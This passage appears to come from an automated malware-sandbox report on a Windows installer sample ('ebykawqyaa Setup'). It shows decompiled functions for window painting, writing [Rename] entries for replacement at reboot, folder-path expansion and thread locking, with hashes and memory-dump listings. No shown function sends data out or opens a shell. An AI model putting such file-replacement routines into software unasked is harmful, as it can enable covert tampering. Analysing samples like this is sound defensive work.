					return 0xc0000bbd;
				} else {
					 *((short*)(_t122 + 0xfffffffffffff7e0)) = 0;
					if( *_a4 != 0) {
						lstrcatW( &_v2084, 0x73226694);
						lstrcatW( &_v2084,  *_a4);
					}
					lstrcatW( &_v2084, 0x7322669c);
					lstrcatW( &_v2084, _a4[1]);
					if(_a4[2] != 0) {
						lstrcatW( &_v2084, 0x732266a0);
						if(_a4[3] != 0) {
							lstrcatW( &_v2084, _a4[3]);
							lstrcatW( &_v2084, 0x732266a4);
						}
						lstrcatW( &_v2084, _a4[2]);
						_t80 = _a4[4];
						0x73220000( &_v36, "#%u", _t80);
						swprintf( &_v36, _t80);
						lstrcatW( &_v2084,  &_v36);
						lstrcatW( &_v2084, 0x732266b0);
					}
					lstrcatW( &_v2084, 0x732266b4);
					lstrcatW( &_v2084, _a4[5]);
					_v8 = lstrlenW( &_v2084) + 1;
					if( *_a12 < _v8) {
						_v12 = 0x800007d2;
					} else {
						lstrcpyW(_a8,  &_v2084);
					}
					 *_a12 = _v8;
					return _v12;
				}
			}











                                                                0x73221ea9
                                                                0x73221ec5
                                                                0x73221eca
                                                                0x73221ed1
                                                                0x73221edc
                                                                0x73221ee1
                                                                0x73221ee1
                                                                0x73221ee8
                                                                0x00000000
                                                                0x73221f0c
                                                                0x73221f16
                                                                0x73221f24
                                                                0x73221f32
                                                                0x73221f45
                                                                0x73221f45
                                                                0x73221f57
                                                                0x73221f6b
                                                                0x73221f78
                                                                0x73221f8a
                                                                0x73221f97
                                                                0x73221fa7
                                                                0x73221fb9
                                                                0x73221fb9
                                                                0x73221fcd
                                                                0x73221fd6
                                                                0x73221fe3
                                                                0x73221ff0
                                                                0x73222003
                                                                0x73222015
                                                                0x73222015
                                                                0x73222027
                                                                0x7322203b
                                                                0x73222051
                                                                0x7322205c
                                                                0x73222071
                                                                0x7322205e
                                                                0x73222069
                                                                0x73222069
                                                                0x7322207e
                                                                0x00000000
                                                                0x73222080

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: lstrcat$lstrcpylstrlenswprintf
                                                                • String ID: #%u$%p %p %p 0x%08x$unimplemented flags 0x%08x
                                                                • API String ID: 332791676-533629115
                                                                • Opcode ID: f8b751b020959fb867ae71b56a1502ab1690e4b1d1eb3d31eeb074e444f28d51
                                                                • Instruction ID: a33818a03157870c07fbb21596e9213a2335d046031a69f697524de3f7c52828
                                                                • Opcode Fuzzy Hash: f8b751b020959fb867ae71b56a1502ab1690e4b1d1eb3d31eeb074e444f28d51
                                                                • Instruction Fuzzy Hash: E8512C76500208EFCB04DF90CC48FAA7B79BB58301F56C548E94A97242DB79EAC4CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 90%
                                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423f50; // 0x771a18
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "ebykawqyaa Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423f48; // 0xc0080
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                                                                0x0040100a
                                                                0x00401039
                                                                0x00401047
                                                                0x0040104d
                                                                0x00401051
                                                                0x0040105b
                                                                0x00401061
                                                                0x00401064
                                                                0x004010f3
                                                                0x00401089
                                                                0x0040108c
                                                                0x004010a6
                                                                0x004010bd
                                                                0x004010cc
                                                                0x004010cf
                                                                0x004010d5
                                                                0x004010d9
                                                                0x004010e4
                                                                0x004010ed
                                                                0x004010ef
                                                                0x004010ef
                                                                0x00401100
                                                                0x00401105
                                                                0x0040110d
                                                                0x00401110
                                                                0x00401112
                                                                0x00401118
                                                                0x0040111f
                                                                0x00401126
                                                                0x00401130
                                                                0x00401142
                                                                0x00401156
                                                                0x00401160
                                                                0x00401165
                                                                0x00401165
                                                                0x00401110
                                                                0x0040116e
                                                                0x00000000
                                                                0x00401178
                                                                0x00401010
                                                                0x00401013
                                                                0x00401015
                                                                0x00401019
                                                                0x0040101f
                                                                0x0040101f
                                                                0x00000000

                                                                APIs
                                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                • GetClientRect.USER32 ref: 0040105B
                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                • FillRect.USER32 ref: 004010E4
                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                • DrawTextA.USER32(00000000,ebykawqyaa Setup,000000FF,00000010,00000820), ref: 00401156
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                • String ID: F$ebykawqyaa Setup
                                                                • API String ID: 941294808-3210021842
                                                                • Opcode ID: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                                                • Instruction ID: 81ce27436f0092abe3ce3185f2c65b9207eacd25275343976a1476a18aae1cf1
                                                                • Opcode Fuzzy Hash: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                                                • Instruction Fuzzy Hash: 06418B71804249AFCB058F95DD459AFBBB9FF44315F00802AF961AA2A0C738EA51DFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004058E6, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 93%
                                                                			E004058E6(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F28(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423fd0 =  *0x423fd0 + 1;
						return _t20;
					}
				}
				 *0x4226c8 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422140, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421d40, "%s=%s\r\n", 0x4226c8, 0x422140);
						_t18 =  *0x423f50; // 0x771a18
						_t56 = _t55 + 0x10;
						E00405BBA(_t43, 0x400, 0x422140, 0x422140,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040586F(0x422140, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004057E4(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057E4(_t26 + 0xa, 0x4093e4);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405830(_t51 + _t29, 0x421d40, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B98(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040586F(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x4226c8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                                                                0x004058ec
                                                                0x004058f3
                                                                0x004058f7
                                                                0x00405900
                                                                0x00405904
                                                                0x00405a43
                                                                0x00405a43
                                                                0x00000000
                                                                0x00405a43
                                                                0x00405904
                                                                0x00405910
                                                                0x00405926
                                                                0x0040594e
                                                                0x00405959
                                                                0x0040595d
                                                                0x0040597d
                                                                0x0040597f
                                                                0x00405984
                                                                0x0040598e
                                                                0x0040599b
                                                                0x004059a0
                                                                0x004059a5
                                                                0x004059a9
                                                                0x00000000
                                                                0x00000000
                                                                0x004059b8
                                                                0x004059ba
                                                                0x004059c7
                                                                0x004059cb
                                                                0x00405a3c
                                                                0x00405a3d
                                                                0x00000000
                                                                0x004059e7
                                                                0x004059f4
                                                                0x00405a59
                                                                0x00405a60
                                                                0x00405a07
                                                                0x00405a07
                                                                0x00405a09
                                                                0x00405a12
                                                                0x00405a1d
                                                                0x00405a2f
                                                                0x00405a36
                                                                0x00000000
                                                                0x00405a36
                                                                0x00405a62
                                                                0x00405a63
                                                                0x00405a68
                                                                0x00405a6a
                                                                0x00405a77
                                                                0x00405a77
                                                                0x00405a7b
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00405a6c
                                                                0x00405a6c
                                                                0x00405a6f
                                                                0x00405a72
                                                                0x00405a73
                                                                0x00000000
                                                                0x00405a6c
                                                                0x004059ff
                                                                0x00405a04
                                                                0x00000000
                                                                0x00405a04
                                                                0x004059cb
                                                                0x00405928
                                                                0x00405933
                                                                0x0040593c
                                                                0x00405940
                                                                0x00000000
                                                                0x00000000
                                                                0x00405940
                                                                0x00405a4d

                                                                APIs
                                                                  • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                  • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,0040567B,?,00000000,000000F1,?), ref: 00405933
                                                                • GetShortPathNameA.KERNEL32 ref: 0040593C
                                                                • GetShortPathNameA.KERNEL32 ref: 00405959
                                                                • wsprintfA.USER32 ref: 00405977
                                                                • GetFileSize.KERNEL32(00000000,00000000,00422140,C0000000,00000004,00422140,?,?,?,00000000,000000F1,?), ref: 004059B2
                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059C1
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059D7
                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D40,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A1D
                                                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A2F
                                                                • GlobalFree.KERNEL32 ref: 00405A36
                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A3D
                                                                  • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                                                  • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                                • String ID: %s=%s$@!B$[Rename]
                                                                • API String ID: 3445103937-2946522640
                                                                • Opcode ID: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                                                • Instruction ID: 3fdb6a032fd62a2424e34f1ba2115feadd67922d203a780a084708b988c1bb31
                                                                • Opcode Fuzzy Hash: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                                                • Instruction Fuzzy Hash: C8410231B01B167BD7206B619D89F6B3A5CEF44755F04013AFD05F62D2E67CA8008EAD
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 732217D0, Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 66synchronizationCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 89%
                                                                			E732217D0(intOrPtr* _a4) {
				intOrPtr* _v8;
				void* _v12;

				_v8 = _a4;
				0x73220000("%p\n", _a4);
				EnterCriticalSection(0x732250ac);
				if(_v8 == 0 ||  *_v8 != 0x50444830) {
					LeaveCriticalSection(0x732250ac);
					return 0xc0000bbc;
				} else {
					if( *(_v8 + 8) == 0) {
						L7:
						E73222C70(_v8);
						LeaveCriticalSection(0x732250ac);
						return 0;
					}
					_v12 =  *(_v8 + 8);
					SetEvent( *(_v8 + 0x14));
					LeaveCriticalSection(0x732250ac);
					WaitForSingleObject(_v12, 0xffffffff);
					EnterCriticalSection(0x732250ac);
					if( *_v8 == 0x50444830) {
						CloseHandle( *(_v8 + 0x14));
						CloseHandle( *(_v8 + 8));
						 *(_v8 + 8) = 0;
						goto L7;
					}
					LeaveCriticalSection(0x732250ac);
					return 0;
				}
			}





                                                                0x732217d9
                                                                0x732217e5
                                                                0x732217f2
                                                                0x732217fc
                                                                0x7322180e
                                                                0x00000000
                                                                0x7322181e
                                                                0x73221825
                                                                0x7322189d
                                                                0x732218a1
                                                                0x732218ae
                                                                0x00000000
                                                                0x732218b4
                                                                0x7322182d
                                                                0x73221837
                                                                0x73221842
                                                                0x7322184e
                                                                0x73221859
                                                                0x73221868
                                                                0x73221880
                                                                0x7322188d
                                                                0x73221896
                                                                0x00000000
                                                                0x73221896
                                                                0x7322186f
                                                                0x00000000
                                                                0x73221875

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(732250AC), ref: 732217F2
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 7322180E
                                                                • SetEvent.KERNEL32(?), ref: 73221837
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 73221842
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 7322184E
                                                                • EnterCriticalSection.KERNEL32(732250AC), ref: 73221859
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 7322186F
                                                                • CloseHandle.KERNEL32(?), ref: 73221880
                                                                • CloseHandle.KERNEL32(?), ref: 7322188D
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 732218AE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CriticalSection$Leave$CloseEnterHandle$EventObjectSingleWait
                                                                • String ID: %p$0HDP$0HDP
                                                                • API String ID: 549566651-208204353
                                                                • Opcode ID: f53d78a5c0ab6e465d63d1518709f044aa9e3bdc66e67a8f6070a3168c5d222f
                                                                • Instruction ID: 72704f269720ac5bf05a86339f93f73f8edcea7330a5b04e263d67e349af821f
                                                                • Opcode Fuzzy Hash: f53d78a5c0ab6e465d63d1518709f044aa9e3bdc66e67a8f6070a3168c5d222f
                                                                • Instruction Fuzzy Hash: 4F21E075A00108EFD704EFA4DE48F5DBBB5AB58306F328254F90A97241D735AF80DB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00405BBA, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 74%
                                                                			E00405BBA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42371c; // 0x7783bd
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x423f78; // 0x776990
				_t74 = _t73 + _t36;
				_t37 = 0x422ee0;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422ee0;
				if(_a4 - 0x422ee0 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BBA(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422ee0;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x425000;
							E00405B98(_t86, (_t95 << 0xa) + 0x425000);
						} else {
							E00405AF6(_t86,  *0x423f48);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DFA(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423fc4;
						if( *0x423fc4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423f44; // 0x74261340
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423f48,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423f48,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423f78;
							E00405A7F(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423f78, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BBA(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B98(_a4, _t37);
			}






























                                                                0x00405bba
                                                                0x00405bba
                                                                0x00405bba
                                                                0x00405bc0
                                                                0x00405bc5
                                                                0x00405bc7
                                                                0x00405bd6
                                                                0x00405bd6
                                                                0x00405bd8
                                                                0x00405be1
                                                                0x00405be3
                                                                0x00405be8
                                                                0x00405beb
                                                                0x00405bec
                                                                0x00405bf3
                                                                0x00405bf5
                                                                0x00405bfb
                                                                0x00405bfe
                                                                0x00405bfe
                                                                0x00405dd7
                                                                0x00405dd7
                                                                0x00405ddb
                                                                0x00000000
                                                                0x00000000
                                                                0x00405c0b
                                                                0x00405c11
                                                                0x00000000
                                                                0x00000000
                                                                0x00405c17
                                                                0x00405c18
                                                                0x00405c1b
                                                                0x00405c1e
                                                                0x00405dca
                                                                0x00405dd4
                                                                0x00405dd6
                                                                0x00405dd6
                                                                0x00405dcc
                                                                0x00405dce
                                                                0x00405dd0
                                                                0x00405dd1
                                                                0x00405dd1
                                                                0x00000000
                                                                0x00405dca
                                                                0x00405c24
                                                                0x00405c28
                                                                0x00405c38
                                                                0x00405c3c
                                                                0x00405c43
                                                                0x00405c46
                                                                0x00405c4a
                                                                0x00405c50
                                                                0x00405c53
                                                                0x00405c56
                                                                0x00405c59
                                                                0x00405d74
                                                                0x00405d77
                                                                0x00405da7
                                                                0x00405daa
                                                                0x00405daf
                                                                0x00405db3
                                                                0x00405db3
                                                                0x00405db8
                                                                0x00405db9
                                                                0x00405dbe
                                                                0x00405dc1
                                                                0x00405dc3
                                                                0x00000000
                                                                0x00405dc3
                                                                0x00405d79
                                                                0x00405d7c
                                                                0x00405d91
                                                                0x00405d98
                                                                0x00405d7e
                                                                0x00405d85
                                                                0x00405d85
                                                                0x00405da0
                                                                0x00405da3
                                                                0x00405d6c
                                                                0x00405d6d
                                                                0x00405d6d
                                                                0x00000000
                                                                0x00405da3
                                                                0x00405c61
                                                                0x00405c62
                                                                0x00405c68
                                                                0x00405c6a
                                                                0x00405c84
                                                                0x00405c84
                                                                0x00405c8b
                                                                0x00405c8b
                                                                0x00405c92
                                                                0x00405c96
                                                                0x00405c96
                                                                0x00405c97
                                                                0x00405c99
                                                                0x00405cd2
                                                                0x00405cd5
                                                                0x00405ce5
                                                                0x00405ce8
                                                                0x00405cf0
                                                                0x00405cf6
                                                                0x00405cf6
                                                                0x00405d52
                                                                0x00405d52
                                                                0x00405d54
                                                                0x00000000
                                                                0x00000000
                                                                0x00405cfa
                                                                0x00405d01
                                                                0x00405d02
                                                                0x00405d04
                                                                0x00405d1e
                                                                0x00405d2c
                                                                0x00405d32
                                                                0x00405d34
                                                                0x00405d4f
                                                                0x00405d4f
                                                                0x00405d4f
                                                                0x00000000
                                                                0x00405d4f
                                                                0x00405d3a
                                                                0x00405d45
                                                                0x00405d4b
                                                                0x00405d4d
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00405d4d
                                                                0x00405d06
                                                                0x00405d09
                                                                0x00000000
                                                                0x00000000
                                                                0x00405d18
                                                                0x00405d1a
                                                                0x00405d1c
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00405d1c
                                                                0x00000000
                                                                0x00405d52
                                                                0x00405cdd
                                                                0x00000000
                                                                0x00405c9b
                                                                0x00405ca0
                                                                0x00405cb6
                                                                0x00405cbb
                                                                0x00405cbe
                                                                0x00405d5b
                                                                0x00405d5b
                                                                0x00405d5f
                                                                0x00405d67
                                                                0x00405d67
                                                                0x00000000
                                                                0x00405d5f
                                                                0x00405cc8
                                                                0x00405d56
                                                                0x00405d56
                                                                0x00405d59
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00405d59
                                                                0x00405c99
                                                                0x00405c6c
                                                                0x00405c70
                                                                0x00000000
                                                                0x00000000
                                                                0x00405c72
                                                                0x00405c76
                                                                0x00000000
                                                                0x00000000
                                                                0x00405c78
                                                                0x00405c7c
                                                                0x00000000
                                                                0x00405c7e
                                                                0x00405c7e
                                                                0x00000000
                                                                0x00405c7e
                                                                0x00405c7c
